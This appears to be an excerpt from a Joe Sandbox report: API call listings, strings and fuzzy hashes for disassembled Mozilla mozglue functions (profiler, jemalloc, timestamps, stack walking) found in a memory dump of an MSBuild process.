Opcode Fuzzy Hash: 15556ba56165be502afec7fe9e6211e22c209c759799c779b4e9c0f6ff616ba3
Instruction Fuzzy Hash: C951F3B1B402156BFB10ABA48C0DFAF7778DF96794F025618F90597AC0DB749D41CB90

Function 6C4DEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DEE60
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEE6D
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C4DEEA5
CloseHandle.KERNEL32(?), ref: 6C4DEEB4
free.MOZGLUE(00000000), ref: 6C4DEEBB
GetCurrentThreadId.KERNEL32 ref: 6C4DEEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DEECF

Part of subcall function 6C4DDE60: GetCurrentThreadId.KERNEL32 ref: 6C4DDE73
Part of subcall function 6C4DDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C4A4A68), ref: 6C4DDE7B
Part of subcall function 6C4DDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C4A4A68), ref: 6C4DDEB8
Part of subcall function 6C4DDE60: free.MOZGLUE(00000000,?,6C4A4A68), ref: 6C4DDEFE
Part of subcall function 6C4DDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C4DDF38

Part of subcall function 6C4CCBE8: GetCurrentProcess.KERNEL32(?,6C4931A7), ref: 6C4CCBF1
Part of subcall function 6C4CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4931A7), ref: 6C4CCBFA

GetCurrentThreadId.KERNEL32 ref: 6C4DEF1E
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEF2B
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEF59
GetCurrentThreadId.KERNEL32 ref: 6C4DEFB0
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEFBD
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DEFE1
GetCurrentThreadId.KERNEL32 ref: 6C4DEFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DF000

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C4DF02F

Part of subcall function 6C4DF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4DF09B
Part of subcall function 6C4DF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C4DF0AC
Part of subcall function 6C4DF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C4DF0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C4DF008
[I %d/%d] profiler_stop, xrefs: 6C4DEED7

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 7b12f486b33ffa1bb42daaa2706bf356761096f591f16e1163a5816d92ba9f92
Instruction ID: 630bd8d747598b690ed47273f0b69e129238371bc9f630f764000632eafa94d4
Opcode Fuzzy Hash: 7b12f486b33ffa1bb42daaa2706bf356761096f591f16e1163a5816d92ba9f92
Instruction Fuzzy Hash: 14510075604210AFEB00FB66DC6EF957BB4EB06219F130619E91983F41DBB5680487EA

Function 6C4CD010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C51E804), ref: 6C4CD047
GetSystemInfo.KERNEL32(?), ref: 6C4CD093
__Init_thread_footer.LIBCMT ref: 6C4CD0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C51E810,00000040), ref: 6C4CD0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C51E7B8,00001388), ref: 6C4CD147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C51E744,00001388), ref: 6C4CD162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C51E784,00001388), ref: 6C4CD18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C51E7DC,00001388), ref: 6C4CD1B1

Strings

: (malloc) Unsupported character in malloc options: ', xrefs: 6C4CD322
MALLOC_OPTIONS, xrefs: 6C4CD0CB
MOZ_CRASH(), xrefs: 6C4CD277
<jemalloc>, xrefs: 6C4CD268, 6C4CD311
Compile-time page size does not divide the runtime one., xrefs: 6C4CD26D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 6b384ad434ead3c03fcbe1ad8429772f6dc4b25e7238e3e64e7d9c2d70c3c3e8
Instruction ID: df79739e92423771123f55db4375f8ebca38f691210d948beae3f6760a69e7bc
Opcode Fuzzy Hash: 6b384ad434ead3c03fcbe1ad8429772f6dc4b25e7238e3e64e7d9c2d70c3c3e8
Instruction Fuzzy Hash: 1481AD78B442409BFB04DF68CC5EF697BB5EB46308F12052AE90197F90DBB59805CBDA

Function 6C4A7FD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C4A8007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C4A801D

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C4A802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C4A803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C4A808D

Part of subcall function 6C4ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C4ACAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C4A809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C4A80B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C4A80DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A80ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A80FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C4A8133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C4A8149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C4A8167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C4A817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A8199

Strings

0>Ml, xrefs: 6C4A811E

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID: 0>Ml
API String ID: 2721933968-4266259228
Opcode ID: 2351d9e2dc4129703fa30b2176bb6b42338e7862c834176a40f4276372105fdb
Instruction ID: 0c8b22d83cf68101168f459422c6c4b4b06ca58bbb839b85451cb691e7722037
Opcode Fuzzy Hash: 2351d9e2dc4129703fa30b2176bb6b42338e7862c834176a40f4276372105fdb
Instruction Fuzzy Hash: 1A5192B2E002449BDB00DBA9DC84EEFB7B9EF99224F150129E815E7741E730AD05CBA1

Function 6C4A5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4A5E9D

Part of subcall function 6C4B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4B56EE,?,00000001), ref: 6C4B5B85
Part of subcall function 6C4B5B50: EnterCriticalSection.KERNEL32(6C51F688,?,?,?,6C4B56EE,?,00000001), ref: 6C4B5B90
Part of subcall function 6C4B5B50: LeaveCriticalSection.KERNEL32(6C51F688,?,?,?,6C4B56EE,?,00000001), ref: 6C4B5BD8
Part of subcall function 6C4B5B50: GetTickCount64.KERNEL32 ref: 6C4B5BE4

GetCurrentThreadId.KERNEL32 ref: 6C4A5EAB
GetCurrentThreadId.KERNEL32 ref: 6C4A5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4A5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C4A6017

Part of subcall function 6C494310: moz_xmalloc.MOZGLUE(00000010,?,6C4942D2), ref: 6C49436A
Part of subcall function 6C494310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C4942D2), ref: 6C494387

moz_xmalloc.MOZGLUE(00000004), ref: 6C4A5F47
GetCurrentProcess.KERNEL32 ref: 6C4A5F53
GetCurrentThread.KERNEL32 ref: 6C4A5F5C
GetCurrentProcess.KERNEL32 ref: 6C4A5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C4A5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C4A5F27

Part of subcall function 6C4ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C4ACAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4A55E1), ref: 6C4A5E8C

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4A55E1), ref: 6C4A605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4A55E1), ref: 6C4A60CC

Strings

GeckoMain, xrefs: 6C4A5ECE, 6C4A6015

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 28c0277bf3bdb884b564c8f93af58f5c20acbbbb5aebfeed1e068703fe971084
Instruction ID: c9b5bf38e57d58a4f7dcf9293a2a577a2a010370eb4dff54d7a2dab0d399d1a6
Opcode Fuzzy Hash: 28c0277bf3bdb884b564c8f93af58f5c20acbbbb5aebfeed1e068703fe971084
Instruction Fuzzy Hash: 3371D2B06097409FD700DF69C884E6ABBF0FF69304F144A6DE88687B52D771E849CB92

Function 6C4A9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4931C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C493217
Part of subcall function 6C4931C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C493236
Part of subcall function 6C4931C0: FreeLibrary.KERNEL32 ref: 6C49324B
Part of subcall function 6C4931C0: __Init_thread_footer.LIBCMT ref: 6C493260
Part of subcall function 6C4931C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C49327F
Part of subcall function 6C4931C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C49328E
Part of subcall function 6C4931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4932AB
Part of subcall function 6C4931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4932D1
Part of subcall function 6C4931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C4932E5
Part of subcall function 6C4931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C4932F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C4A9675
__Init_thread_footer.LIBCMT ref: 6C4A9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C4A96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C4A9707
__Init_thread_footer.LIBCMT ref: 6C4A971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C4A9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C4A97B7
FreeLibrary.KERNEL32 ref: 6C4A97D0
FreeLibrary.KERNEL32 ref: 6C4A97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C4A9824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C4A9670
MapViewOfFileNuma2, xrefs: 6C4A97B1
ntdll.dll, xrefs: 6C4A96E3
NtMapViewOfSection, xrefs: 6C4A9701

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: c8d89fa2118a287b955c8d67f0b3bf7960f2878297f86bf2659723f81d913d15
Instruction ID: 4ee7675971cd22273fa479e9a60f1f91e644fe2097d69e945d855829f828beed
Opcode Fuzzy Hash: c8d89fa2118a287b955c8d67f0b3bf7960f2878297f86bf2659723f81d913d15
Instruction Fuzzy Hash: 0561F4B5704201DBDF00DFA4DC8EF9A7BB1EB6A314F114219E91683F90D7329855CBA5

Function 6C4A11B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C4A1213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C4A1285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C4A12B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C4A1327

Strings

CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C4A131B
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C4A12AD
MZx, xrefs: 6C4A11E1
&, xrefs: 6C4A126B
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C4A120D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: 0f2c6f7b49044dc98a828272053224efb704d29a20c408f13333183c9daa5b9d
Instruction ID: b8ccfde8dbb20f86876ccbd89ae68aca22dd6f752c60994250015feb488098e3
Opcode Fuzzy Hash: 0f2c6f7b49044dc98a828272053224efb704d29a20c408f13333183c9daa5b9d
Instruction Fuzzy Hash: 44719D75A05658CADB10DFA88C04FDEBBF1BF64309F04065ED445A3B44D774AA8ACBE2

Function 6C4931C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C493217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C493236
FreeLibrary.KERNEL32 ref: 6C49324B
__Init_thread_footer.LIBCMT ref: 6C493260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C49327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C49328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4932AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4932D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C4932E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C4932F7

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

__aulldiv.LIBCMT ref: 6C49346B

Strings

KernelBase.dll, xrefs: 6C493212
QueryInterruptTime, xrefs: 6C493230

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 80fd73dd9927efe0f6d1ccb979aed807f2e885f2f308cb9b8203d18a5753a6b3
Instruction ID: fa293ba43a29c960c5f0279c6dcfee3b8e92ab9f5100f4ad10cbad5204e42fbc
Opcode Fuzzy Hash: 80fd73dd9927efe0f6d1ccb979aed807f2e885f2f308cb9b8203d18a5753a6b3
Instruction Fuzzy Hash: 8B611671A087018BC711CF34C855E5AB7F5FFC6394F128B1DE8A9A3A90EB309545CB86

Function 6C4F6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C51F618), ref: 6C4F6694
GetThreadId.KERNEL32(?), ref: 6C4F66B1
GetCurrentThreadId.KERNEL32 ref: 6C4F66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C4F66E1
EnterCriticalSection.KERNEL32(6C51F618), ref: 6C4F6734
GetCurrentProcess.KERNEL32 ref: 6C4F673A
LeaveCriticalSection.KERNEL32(6C51F618), ref: 6C4F676C
GetCurrentThread.KERNEL32 ref: 6C4F67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C4F6868
RtlCaptureContext.NTDLL ref: 6C4F687F

Strings

WalkStack64, xrefs: 6C4F6890

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 350bcfd52d66b1891dfb80269ab0a39a1c2325874415d093a18065f547eec8b2
Instruction ID: a625c781cd0b1040cccaa54681b70d5b5ff73189c8ce4a1cf0cc86eb32a7411a
Opcode Fuzzy Hash: 350bcfd52d66b1891dfb80269ab0a39a1c2325874415d093a18065f547eec8b2
Instruction Fuzzy Hash: F4518B71A09301AFDB11DF24C849E9BBBF4BF89714F01492DF9A987B40D770A9098B96

Function 6C4DDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DDE73
GetCurrentThreadId.KERNEL32 ref: 6C4DDF7D
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DDF8A
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DDFC9
GetCurrentThreadId.KERNEL32 ref: 6C4DDFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DE000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C4A4A68), ref: 6C4DDE7B

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

Part of subcall function 6C4CCBE8: GetCurrentProcess.KERNEL32(?,6C4931A7), ref: 6C4CCBF1
Part of subcall function 6C4CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4931A7), ref: 6C4CCBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C4A4A68), ref: 6C4DDEB8
free.MOZGLUE(00000000,?,6C4A4A68), ref: 6C4DDEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C4DDF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C4DDE83
<none>, xrefs: 6C4DDFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C4DE00E

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 96ffb1108c15a7147588d3a6e1693d410ade20905a11266ac20207a154eda81d
Instruction ID: 85ca8d3596c027b4db1f88e224d09f06ca440909b3c2d9c7afd9f793db18c4dd
